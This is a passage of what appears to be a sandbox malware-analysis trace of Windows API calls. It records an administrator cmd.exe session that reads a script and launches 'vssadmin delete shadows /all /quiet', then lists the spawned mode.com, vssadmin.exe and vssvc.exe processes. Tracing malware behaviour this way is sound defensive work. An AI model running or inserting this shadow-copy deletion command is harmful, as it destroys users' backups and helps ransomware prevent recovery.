lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.064] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0036.064] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.064] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0036.064] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.064] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0036.064] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0036.065] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.065] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.065] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.065] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0036.066] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.066] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.066] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.066] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0036.066] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.066] GetFileType (hFile=0xe8) returned 0x3 [0036.066] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.066] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.066] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.066] GetFileType (hFile=0xf4) returned 0x3 [0036.066] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.066] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0036.066] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x20f6d8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f6d8*=0x24, lpOverlapped=0x0) returned 1 [0036.066] GetProcessHeap () returned 0x2f0000 [0036.066] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30f630 [0036.066] GetProcessHeap () returned 0x2f0000 [0036.066] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30f630 | out: hHeap=0x2f0000) returned 1 [0036.066] GetProcessHeap () returned 0x2f0000 [0036.066] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x3097e0 [0036.066] GetProcessHeap () returned 0x2f0000 [0036.066] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x22) returned 0x304610 [0036.067] GetProcessHeap () returned 0x2f0000 [0036.067] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x30aa90 [0036.067] GetConsoleOutputCP () returned 0x4e3 [0036.074] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x49e1bfe0 | out: lpCPInfo=0x49e1bfe0) returned 1 [0036.075] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0036.090] GetConsoleTitleW (in: lpConsoleTitle=0x20f690, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0036.091] GetProcessHeap () returned 0x2f0000 [0036.091] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x309910 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5a) returned 0x309b30 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x309090 [0036.092] SetErrorMode (uMode=0x0) returned 0x0 [0036.092] SetErrorMode (uMode=0x1) returned 0x0 [0036.092] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3090a0, lpFilePart=0x20ef20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20ef20*="Desktop") returned 0x25 [0036.092] SetErrorMode (uMode=0x0) returned 0x1 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309090, Size=0x6e) returned 0x309090 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309090) returned 0x6e [0036.092] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.092] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x305b70 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x2f1ab0 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1ab0, Size=0x12a) returned 0x2f1ab0 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1ab0) returned 0x12a [0036.092] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x309db0 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309db0, Size=0x7e) returned 0x309db0 [0036.092] GetProcessHeap () returned 0x2f0000 [0036.092] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309db0) returned 0x7e [0036.092] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.092] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0xffffffffffffffff [0036.093] GetLastError () returned 0x2 [0036.093] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0xffffffffffffffff [0036.093] GetLastError () returned 0x2 [0036.093] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.093] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0x309ba0 [0036.093] FindClose (in: hFindFile=0x309ba0 | out: hFindFile=0x309ba0) returned 1 [0036.093] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0xffffffffffffffff [0036.093] GetLastError () returned 0x2 [0036.093] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ec90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec90) returned 0x309ba0 [0036.093] FindClose (in: hFindFile=0x309ba0 | out: hFindFile=0x309ba0) returned 1 [0036.093] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.093] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.093] GetConsoleTitleW (in: lpConsoleTitle=0x20f1e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0036.093] GetProcessHeap () returned 0x2f0000 [0036.093] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x21c) returned 0x309110 [0036.094] GetConsoleTitleW (in: lpConsoleTitle=0x309120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0036.094] GetProcessHeap () returned 0x2f0000 [0036.094] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309110, Size=0xc0) returned 0x309110 [0036.094] GetProcessHeap () returned 0x2f0000 [0036.094] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309110) returned 0xc0 [0036.094] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0036.094] GetProcessHeap () returned 0x2f0000 [0036.094] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309110 | out: hHeap=0x2f0000) returned 1 [0036.094] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ef98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef58 | out: lpAttributeList=0x20ef98, lpSize=0x20ef58) returned 1 [0036.094] UpdateProcThreadAttribute (in: lpAttributeList=0x20ef98, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ef98, lpPreviousValue=0x0) returned 1 [0036.094] GetStartupInfoW (in: lpStartupInfo=0x20f0b0 | out: lpStartupInfo=0x20f0b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0036.095] GetProcessHeap () returned 0x2f0000 [0036.095] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304640 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.095] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.095] GetProcessHeap () returned 0x2f0000 [0036.095] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304640 | out: hHeap=0x2f0000) returned 1 [0036.095] GetProcessHeap () returned 0x2f0000 [0036.096] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308900 [0036.096] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x20efd0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef80 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x20ef80*(hProcess=0x50, hThread=0x54, dwProcessId=0xa18, dwThreadId=0xa1c)) returned 1 [0036.161] CloseHandle (hObject=0x54) returned 1 [0036.161] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.161] GetProcessHeap () returned 0x2f0000 [0036.161] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30eb10 | out: hHeap=0x2f0000) returned 1 [0036.161] GetEnvironmentStringsW () returned 0x30eb10* [0036.161] GetProcessHeap () returned 0x2f0000 [0036.161] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30f630 [0036.161] FreeEnvironmentStringsW (penv=0x30eb10) returned 1 [0036.161] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x20e888, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x20e888, ReturnLength=0x0) returned 0x0 [0036.161] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdd000, lpBuffer=0x20e8c0, nSize=0x380, lpNumberOfBytesRead=0x20e880 | out: lpBuffer=0x20e8c0*, lpNumberOfBytesRead=0x20e880*=0x380) returned 1 [0036.161] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x4c0ee000" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9b4" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0x9e4 Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4d117000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9b4" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0xa1c Thread: id = 21 os_tid = 0xa24 Thread: id = 22 os_tid = 0xa30 Thread: id = 24 os_tid = 0xa38 Thread: id = 25 os_tid = 0xa3c Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4577b000" os_pid = "0xabc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007916b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 27 os_tid = 0xad8 Thread: id = 28 os_tid = 0xad4 Thread: id = 29 os_tid = 0xad0 Thread: id = 30 os_tid = 0xacc [0045.578] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf4dac0 | out: lpSystemTimeAsFileTime=0xf4dac0*(dwLowDateTime=0x24db45a0, 